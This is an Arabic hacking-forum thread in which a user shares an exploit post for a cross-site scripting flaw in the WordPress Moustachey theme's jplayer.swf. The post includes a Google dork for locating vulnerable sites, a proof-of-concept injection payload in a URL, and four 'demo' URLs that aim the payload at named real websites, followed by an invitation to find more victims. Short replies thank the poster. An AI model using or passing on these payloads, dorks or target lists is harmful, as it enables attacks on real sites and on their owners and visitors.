حالة الموضوع:
مغلق
  1. Ubuntu

    Ubuntu Developer

    الأنتساب:
    ‏6 يناير 2013
    المشاركات:
    62
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    8
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله تعالى وبركاته
    [INFO]WordPress Moustachey (jplayer.swf) Cross Site Scripting vulnerability[/INFO]
    كود PHP:
    X-------------------------------------------------------------X
     _____ _   _ _   _ _____ _____ _____  ___   _   _   _______   _______ ___________ 
    |_   _| | | | \ | |_   _/  ___|_   _|/ \ | \ | | /  __ \ \ / / ___ \  ______ \
      | | | | | |  \| | | | \ `
    --.  | | / /_\ \|  \| | | /  \/\ V /| |_/ / |__ | |_/ /
      | | | | | | . 
    ` | | |  `--. \ | | |  _  || . ` | | |     \ / | ___ \  __||    / 
      | | | |
    _| | |\  |_| |_/\__/ /_| |_| | | || |\  | | \__/\ | | | |_/ / |___| |\ \ 
      \
    _/  \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/  \____/ \_/ \____/\____/\_| \_|
    X-------------------------------------------------------------X                                                                                  
     
     
    ***91;+***93AuthorTUNISIAN CYBER
    ***91;+***93Exploit Title:  WordPress Moustachey (jplayer.swfCross Site Scripting vulnerability
    ***91;+***93Date3-12-2013
    ***91;+***93CategoryWebApp
    ***91;+***93Google Dorkinurl:"/wp-content/themes/moustachey"
    ***91;+***93Tested onWin7 ubuntu 13.04
     
     
    ########################################################################################

    Proof:

    http//127.0.0.1/***91;Path***93;/wwp-content/themes/moustachey/assets/js/plugins/jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!*****(/1337day TUNISIAN CYBER/)//

     
    Demos:
    http://zacharyflower.com/wordpress/wp-content/themes/moustachey/assets/js/plugins/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!*****(/1337day%20TUNISIAN%20CYBER/)//
    http://officinadacamera.com/n/wp-content/themes/moustachey/assets/js/plugins/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!*****(/1337day%20TUNISIAN%20CYBER/)//
    http://themexpatriate.com/wp-content/themes/moustachey/assets/js/plugins/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!*****(/1337day%20TUNISIAN%20CYBER/)//
    http://www.abakan.fr/wp-content/themes/moustachey/assets/js/plugins/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!*****(/1337day%20TUNISIAN%20CYBER/)//

    the rest google

    ./3nD
    ########################################################################################
     
  2. Tr0J4n

    Tr0J4n ExpErt DeveloPer

    الأنتساب:
    ‏3 سبتمبر 2011
    المشاركات:
    50
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    الصين الشعبيه
    رد: WordPress Moustachey (jplayer.swf) Cross Site Scripting vulnerability

    مشكوور اخووي .. ^:"​
     
  3. ӎƦ.HmidE

    ӎƦ.HmidE DeveloPer Plus

    الأنتساب:
    ‏9 يوليو 2012
    المشاركات:
    106
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    18
    الوظيفة:
    .....
    الإقامة:
    JoRdaN
    رد: WordPress Moustachey (jplayer.swf) Cross Site Scripting vulnerability

    بارك الله فيك والله يعطيك الف عافيه ​
     
  4. NETJOURNAL

    NETJOURNAL مشرف

    الأنتساب:
    ‏18 مايو 2006
    المشاركات:
    676
    الإعجابات المتلقاة:
    1,543
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    الوظيفة:
    ExploitCoding - ShellCoding - Defacer
    الإقامة:
    etc/shadow/~root
    رد: WordPress Moustachey (jplayer.swf) Cross Site Scripting vulnerability

    شكرا جزيلا .
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة